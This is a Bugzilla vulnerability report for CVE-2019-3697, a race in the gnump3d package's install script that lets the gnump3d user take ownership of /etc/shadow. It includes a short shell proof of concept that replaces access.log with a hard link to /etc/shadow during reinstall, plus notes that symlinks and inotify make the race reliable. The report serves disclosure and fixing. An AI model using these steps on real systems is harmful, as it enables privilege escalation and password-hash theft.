Bugzilla – Bug 1154229
VUL-0: CVE-2019-3697: gnump3d: LPE from gnump3d to root
Last modified: 2020-07-20 12:20:28 UTC
80 %post 81 # if there is no access.log file, create one with correct permissions. 82 # gnump3d does not do this. 83 test -f /var/log/gnump3d/access.log || { 84 touch /var/log/gnump3d/access.log; 85 chmod 640 /var/log/gnump3d/access.log; 86 chown gnump3d /var/log/gnump3d/access.log 87 } allows LPE on systems with fs.protected_hardlinks=0 if the race is won. zypper ar https://download.opensuse.org/repositories/home:/jsegitz:/branches:/multimedia:/apps/openSUSE_Tumbleweed/home:jsegitz:branches:multimedia:apps.repo to make winning the race easy POC: sh-5.0$ id uid=63(gnump3d) gid=65534(nogroup) groups=65534(nogroup) sh-5.0$ pwd /var/log/gnump3d sh-5.0$ rm access.log As root: zypper in -f gnump3d When installation hangs as gnump3d sh-5.0$ rm access.log; ln /etc/shadow access.log sh-5.0$ ls -lah /etc/shadow -rw-r----- 2 gnump3d shadow 1.6K Oct 16 15:58 /etc/shadow
works with symlinks, so no need for fs.protected_hardlinks=0
I can reliably exploit this using inotify and relinking after touch ran. Please use CVE-2019-3697 to track this
Sent delete request to remove this from Factory as it's unmaintained
dropped from Factory